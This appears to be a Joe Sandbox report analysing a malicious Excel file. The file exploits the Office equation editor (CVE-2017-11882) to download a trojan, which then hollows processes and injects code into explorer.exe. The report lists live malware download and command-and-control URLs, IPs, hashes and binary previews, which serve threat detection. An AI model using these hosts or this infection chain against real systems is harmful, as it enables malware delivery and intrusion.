            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552850 Sample: RFQ HCI20220113.xlsx Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 36 www.norfg.com 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 18 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 25 2->15         started        signatures3 process4 dnsIp5 44 198.23.213.59, 49167, 80 AS-COLOCROSSINGUS United States 10->44 30 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->30 dropped 32 C:\Users\Public\vbc.exe, PE32 10->32 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->78 17 vbc.exe 1 5 10->17         started        34 C:\Users\user\...\~$RFQ HCI20220113.xlsx, data 15->34 dropped file6 signatures7 process8 signatures9 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 vbc.exe 17->20         started        process10 signatures11 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process12 dnsIp13 38 ecommerceoptimise.com 192.185.98.251, 49172, 80 UNIFIEDLAYER-AS-1US United States 23->38 40 terapiaholisticaemformacao.com 216.172.160.188, 49171, 80 UNIFIEDLAYER-AS-1US United States 23->40 42 8 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 27 cmd.exe 23->27         started        signatures14 process15 signatures16 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ HCI20220113.xlsx34%VirustotalBrowse
            RFQ HCI20220113.xlsx30%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\vbc.exe100%AviraHEUR/AGEN.1211287
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%AviraHEUR/AGEN.1211287
            C:\Users\Public\vbc.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe44%ReversingLabsByteCode-MSIL.Trojan.Bulz
            C:\Users\Public\vbc.exe44%ReversingLabsByteCode-MSIL.Trojan.Bulz

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.11a0000.2.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.6.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.8.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.1.unpack100%AviraHEUR/AGEN.1211287Download File
            5.2.vbc.exe.11a0000.4.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.0.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.10.unpack100%AviraHEUR/AGEN.1211287Download File
            4.0.vbc.exe.11a0000.0.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.11a0000.3.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.4.unpack100%AviraHEUR/AGEN.1211287Download File
            4.2.vbc.exe.11a0000.2.unpack100%AviraHEUR/AGEN.1211287Download File

            Domains

            SourceDetectionScannerLabelLink
            www.norfg.com0%VirustotalBrowse
            terapiaholisticaemformacao.com4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://java.sun.com0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://198.23.213.59/1155/vbc.exe100%Avira URL Cloudmalware
            http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==0%Avira URL Cloudsafe
            http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw==0%Avira URL Cloudsafe
            http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            www.topeasyip.company/i5nb/100%Avira URL Cloudmalware
            http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw==0%Avira URL Cloudsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe
            http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr0%Avira URL Cloudsafe
            http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ecommerceoptimise.com
            		192.185.98.251
            		truetrue
              		unknown
              www.norfg.com
              		43.134.0.76
              		truefalseunknown
              terapiaholisticaemformacao.com
              		216.172.160.188
              		truetrueunknown
              www.circlessalaries.com
              		195.211.74.112
              		truetrue
                		unknown
                www.ylhwcl.com
                		122.10.28.11
                		truetrue
                  		unknown
                  www.bjbwx114.com
                  		23.80.120.93
                  		truetrue
                    		unknown
                    www.integratedheartspsychology.com
                    		221.121.143.148
                    		truetrue
                      		unknown
                      www.orphe.biz
                      		103.224.212.220
                      		truetrue
                        		unknown
                        www.terapiaholisticaemformacao.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.topeasyip.company
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ecommerceoptimise.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://198.23.213.59/1155/vbc.exetrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.topeasyip.company/i5nb/true
                              • Avira URL Cloud: malware
                              		low
                              http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==true
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                		high
                                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://investor.msn.comexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                      		high
                                      http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://investor.msn.com/explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.%s.comPAexplorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		low
                                            http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              https://support.mozilla.orgexplorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                                		high
                                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                                  		high
                                                  http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  103.224.212.220
                                                  		www.orphe.bizAustralia
                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                  221.121.143.148
                                                  		www.integratedheartspsychology.comAustralia
                                                  		45671AS45671-NET-AUWholesaleServicesProviderAUtrue
                                                  216.172.160.188
                                                  		terapiaholisticaemformacao.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                  23.80.120.93
                                                  		www.bjbwx114.comUnited States
                                                  		395954LEASEWEB-USA-LAX-11UStrue
                                                  195.211.74.112
                                                  		www.circlessalaries.comNetherlands
                                                  		51696ANTAGONIST-ASNLtrue
                                                  122.10.28.11
                                                  		www.ylhwcl.comHong Kong
                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                  198.23.213.59
                                                  		unknownUnited States
                                                  		36352AS-COLOCROSSINGUStrue
                                                  192.185.98.251
                                                  		ecommerceoptimise.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1UStrue

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:552850
                                                  Start date:13.01.2022
                                                  Start time:20:20:36
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:RFQ HCI20220113.xlsx
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winXLSX@7/18@9/8
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 30.5% (good quality ratio 28.1%)
                                                  • Quality average: 67.3%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xlsx
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  20:21:46API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                  20:21:49API Interceptor76x Sleep call for process: vbc.exe modified
                                                  20:22:12API Interceptor171x Sleep call for process: cmd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Reputation:low
                                                  IE Cache URL:http://198.23.213.59/1155/vbc.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H?.a.................V..........:u... ........@.. ....................................@..................................t..W.................................................................................... ............... ..H............text...@U... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................u......H.......|F..d.......-....]..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....oc...*..{....*.s..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1628828
                                                  Entropy (8bit):2.229123093390047
                                                  Encrypted:false
                                                  SSDEEP:3072:UVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:ULjXlN0k1fKANpFZIiByA764
                                                  MD5:E5B435F23CA21C551E2EB0AD7511289A
                                                  SHA1:139160E066DA9E9E7DBD234C5B554CCEBE307138
                                                  SHA-256:2A64589D13E424512714FD43F0AD13D4870489D7D5DF1CB86A6A6AC84560D3EF
                                                  SHA-512:3E576211D088A0ECDE7D572CFE9684E84154E3191FAFF9A2C42E3E007006FE95FFD87E4EE6781A5DB5C6C394A4D7A2B85F651E9499DBEF019074EFA84972AFED
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ....l...........................m>...&.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................Tz$........f^z.@~.%...............D.......RQ.VD...<...........(...$Q.VD...<... ...Id^z<...D... ............d^z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...<...p....8Vz........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\220FF079.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............=c....tEXtSoftware.Adobe ImageReadyq.e<...~iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:DocumentID="xmp.did:EDC9411A6A5F11E2838BB9184F90E845" xmpMM:InstanceID="xmp.iid:EDC941196A5F11E2838BB9184F90E845" xmp:CreatorTool="Adobe Photoshop CS2 Windows"> <xmpMM:DerivedFrom stRef:instanceID="uuid:5A79598F285EDB11B275CB8CE9AFFC64" stRef:documentID="adobe:docid:photoshop:51683bff-375b-11d9-ab90-a923e782e0b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...F....PLTE..............
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29ED4C58.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD030D5.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD458D2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
